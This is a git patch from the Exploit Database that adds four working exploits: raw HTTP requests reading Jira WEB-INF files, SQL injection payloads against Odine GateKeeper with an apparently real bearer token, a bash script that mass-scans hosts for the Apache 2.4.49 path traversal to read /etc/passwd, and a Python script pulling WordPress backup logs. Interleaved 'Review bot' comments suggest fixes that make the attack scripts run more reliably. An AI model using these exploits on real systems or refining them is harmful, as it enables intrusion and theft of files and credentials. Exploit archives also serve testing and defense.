From bd08b79b4a7ca69cfb504b6e45a0642c4300ce86 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 7 Oct 2021 05:02:12 +0000
Subject: [PATCH] DB: 2021-10-07

4 changes to exploits/shellcodes

Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
Apache HTTP Server 2.4.49 - Path Traversal
---
 exploits/multiple/webapps/50380.txt | 87 +++++++++++++++++++++++++++++
 exploits/multiple/webapps/50381.txt | 42 ++++++++++++++
 exploits/multiple/webapps/50383.sh  | 18 ++++++
 exploits/php/webapps/50382.py       | 59 +++++++++++++++++++
 files_exploits.csv                  |  4 ++
 5 files changed, 210 insertions(+)
 create mode 100644 exploits/multiple/webapps/50380.txt
 create mode 100644 exploits/multiple/webapps/50381.txt
 create mode 100755 exploits/multiple/webapps/50383.sh
 create mode 100755 exploits/php/webapps/50382.py

diff --git a/exploits/multiple/webapps/50380.txt b/exploits/multiple/webapps/50380.txt
new file mode 100644
index 000000000..275fef744
--- /dev/null
+++ b/exploits/multiple/webapps/50380.txt
@@ -0,0 +1,87 @@
+# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
+# Date: 2021-10-05
+# Exploit Author: Mayank Deshmukh
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/jira/download/data-center
+# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
+# Tested on: Kali Linux & Windows 10
+# CVE : CVE-2021-26086
+
+POC File #1 - web.xml
+
+GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+
+POC File #2 - seraph-config.xml
+
+GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #3 - decorators.xml
+
+GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+
+POC File #4 - /jira-webapp-dist/pom.properties
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #5 - /jira-webapp-dist/pom.xml
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #6 - /atlassian-jira-webapp/pom.xml
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #7 - /atlassian-jira-webapp/pom.properties
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
\ No newline at end of file
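Review bot: The header's `# Tested on: Kali Linux & Windows 10` names the client systems, not the Jira build or platform the requests were run against, which is what a reader wants from that field; something like `# Tested on: Jira Server <actual build tested> (<platform>)` would be clearer. The affected ranges in the `# Version` line only imply the fixed releases; stating them explicitly (`# Fixed in: 8.5.14 / 8.13.6 / 8.16.1`, if that reading of the ranges is right) saves defenders a comparison. A one-line hint that all seven requests share the `/s/…/;/WEB-INF/` and `/s/…/;/META-INF/` path shape would also help anyone reviewing access logs for this issue.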
diff --git a/exploits/multiple/webapps/50381.txt b/exploits/multiple/webapps/50381.txt
new file mode 100644
index 000000000..039cff2cf
--- /dev/null
+++ b/exploits/multiple/webapps/50381.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
+# Date: 05.10.2021
+# Exploit Author: Emel Basayar
+# Vendor: Odine Solutions - odinesolutions.com
+# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
+# Version: 1.0
+# Category: Webapps
+# Tested on: Ubuntu 18 TLS
+# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
+# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.
+====================================================
+
+# PoC : SQLi :
+
+GET /rass/api/v1/trafficCycle/98 HTTP/1.1
+Host: 192.168.1.25
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
+Accept: application/json
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
+Origin: https://192.168.1.25
+Connection: close
+Referer: https://192.168.1.25
+
+Parameter: #1* (URI)
+    Type: error-based
+    Title: PostgreSQL AND error-based - WHERE or HAVING clause
+    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB
+
+    Type: stacked queries
+    Title: PostgreSQL > 8.1 stacked queries (comment)
+    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--
+
+    Type: time-based blind
+    Title: PostgreSQL > 8.1 AND time-based blind
+    Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
+---
+web application technology: Nginx
+back-end DBMS: PostgreSQL
+
+====================================================
\ No newline at end of file
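Review bot: The `Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx` header in the PoC request looks like a live API token rather than a placeholder; a published request should carry `Authorization: Bearer <REDACTED>` so no credential from the engagement is disclosed, and the token should be rotated if it was real. The description states the vulnerability was fixed but gives no fixed version or date; `# Fixed in: <vendor fix version>` would let readers check their own deployment. `# Tested on: Ubuntu 18 TLS` presumably means `LTS`.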
diff --git a/exploits/multiple/webapps/50383.sh b/exploits/multiple/webapps/50383.sh
new file mode 100755
index 000000000..aea6670d4
--- /dev/null
+++ b/exploits/multiple/webapps/50383.sh
@@ -0,0 +1,18 @@
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
+# Date: 10/05/2021
+# Exploit Author: Lucas Souza https://lsass.io
+# Vendor Homepage:  https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+# Credits: Ash Daulton and the cPanel Security Team
+
+#!/bin/bash
+
+if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
\ No newline at end of file
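Review bot: The `#!/bin/bash` placed below the header comments is not an interpreter directive — a shebang is only honoured on line 1 — so the file runs under whatever shell the caller uses, and the bash-only `[[ ]]` test errors out under a POSIX `sh`; move it above `# Exploit Title`. On the `if` line, `if [[ $1 == '' ]]; [[ $2 == '' ]]; then` discards the result of the first test, so a missing first argument on its own never reaches the usage message and `cat` is run on an empty name; `if [[ -z "$1" || -z "$2" ]]; then` states the intent. The `=3D=3D` on that line reads like quoted-printable residue from the patch mail rather than the committed text — worth confirming the file actually contains `==`. The usage text also misspells `TARGET-LIST.TXT`.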
diff --git a/exploits/php/webapps/50382.py b/exploits/php/webapps/50382.py
new file mode 100755
index 000000000..cb242843b
--- /dev/null
+++ b/exploits/php/webapps/50382.py
@@ -0,0 +1,59 @@
+# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
+# Date 04.10.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://forum.ait-pro.com/read-me-first/
+# Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip
+# Version: <= 5.1
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2021-39327
+# CWE: CWE-200
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md
+
+
+'''
+Description:
+The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible
+~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files.
+This affects versions up to, and including, 5.1.
+'''
+
+'''
+'Banner:
+'''
+banner = '''
+  ______     _______     ____   ___ ____  _      _____ ___ _________ _____
+ / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ // _ \___ /___ \___  |
+| |    \ \ / /|  _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / /
+| |___  \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / /
+ \____|  \_/  |_____|   |_____|\___/_____|_|    |____/  /_/____/_____/_/
+
+                                * Sensitive information disclosure
+                                @ Author: Ron Jost
+'''
+print(banner)
+
+
+import argparse
+import requests
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+print('')
+print('[*] Starting Exploit:')
+print('')
+
+paths = ["/wp-content/bps-backup/logs/db_backup_log.txt",  "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"]
+
+# Exploit
+for pathadd in paths:
+    x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd)
+    print(x.text)
\ No newline at end of file
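Review bot: The loop at the end prints `x.text` for every response, so a 404 page, a redirect body or a block page is printed exactly like the disclosed log and the output cannot be read as a result without checking `x.status_code`; `if x.status_code == 200:` before the `print`, or printing the status code alongside the body, makes the outcome unambiguous. The three `add_argument` calls have no `required=True`, so omitting any flag leaves `None` in the URL concatenation and the script dies with a `TypeError` instead of a usage message. `requests.get` is also called without a `timeout=`, so an unresponsive host hangs the loop indefinitely. Stylistically, the `import` lines sit after the banner `print`; PEP 8 puts them at the top of the file.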
diff --git a/files_exploits.csv b/files_exploits.csv
index 52036d535..8ad474693 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44492,3 +44492,7 @@ id,file,description,date,author,type,platform,port
 50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java,
 50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php,
 50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
+50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple,
+50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple,
+50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php,
+50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal",1970-01-01,"Lucas Souza",webapps,multiple,